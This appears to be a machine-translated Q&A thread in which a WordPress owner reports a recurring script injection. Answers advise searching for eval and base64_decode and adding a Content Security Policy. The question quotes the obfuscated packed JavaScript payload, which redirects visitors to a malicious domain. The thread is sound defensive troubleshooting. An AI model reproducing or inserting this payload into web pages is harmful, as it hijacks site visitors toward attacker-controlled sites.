2016-07-02 2 views
2

Мой блог на WordPress получает следующий вредоносный скрипт впрыскивается:Javascript профилактика Инъекции на Wordpress

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('3.5.4="6://%1%0%0%9%2%8%7%1%2/";',10,10,'78|6F|6D|window|href|location|http|63|2E|74'.split('|'),0,{})) 

Он переходит к:

  • http://oxxtm.com/ который перенаправляет:
    • http://www.html5website.com/

Я уже отключил несколько плагинов, но похоже, что проблема где-то еще, потому что я буду использовать следующие плагины и они, кажется, имеют хорошую репутацию:

  • Akismet
  • Captcha на Вход
  • Free & Simple Contact Form Plugin - PirateForms (рекомендуется по моей теме Zerif Lite)
  • SMTP Mailer
  • WooCommerce

Если я не могу найти корневую ситуацию, вы бы посоветовали обработать событие «перенаправления», чтобы поддерживать сайт? Если да, то как я мог бы обрабатывать, если есть перенаправление, указывающее на http://oxxtm.com/ и прервать его с помощью javascript?

Я пробовал использовать события onunload и onbeforeunload, но кажется, что введенный eval, работает до того, как манипуляция события даже зарегистрирована.

Я вижу, что он вводится на разных страницах PHP (иногда только один раз) в wordpress, и я не знаю, есть ли общий PHP-файл, в который я мог бы включить скрипт, чтобы предотвратить действие этого вредоносный скрипт.

Я уже несколько раз удалял вредоносный скрипт, но он снова вводится снова &. Мне нужно лечить симптом, пока я ищу причину, или сайт будет неработоспособным. Однако я не понимаю, как в первую очередь вводится сценарий.

+1

Вместо лечения симптома, например. перенаправление, найти зараженные файлы и удалить вредоносный код. –

+0

@PatrickEvans Я уже удалял его несколько раз, но он снова вводится. Мне нужно лечить симптом, пока я искал причину. – ClayKaboom

ответ

2

Поиск с во всех ваших файлов следующего содержания:. Eval (функция()

Он покажет вам каждые файлы, которые содержат этот код

В противном случае, попробуйте поискать это: base64_decode

Это функция, которая позволяет декодировать текст с кодировкой base64, который часто используется вредоносными файлами PHP для инъекции некоторого кода, который вы не можете обнаружить, путем поиска eval (

Если проблема не устранена, ответьте здесь, Попробуем t Помогите вам.

1

Кроме того, в качестве дополнительной функции для защиты вашей клиентской стороны от XSS, я могу предложить вам использовать CSP после очистки вашего бэкэнда от инъекции. Вы можете узнать больше об этом: https://developer.mozilla.org/en/docs/Web/Security/CSP Это не серебристая пуля, но приятно иметь ее для защиты пользователей.

Смежные вопросы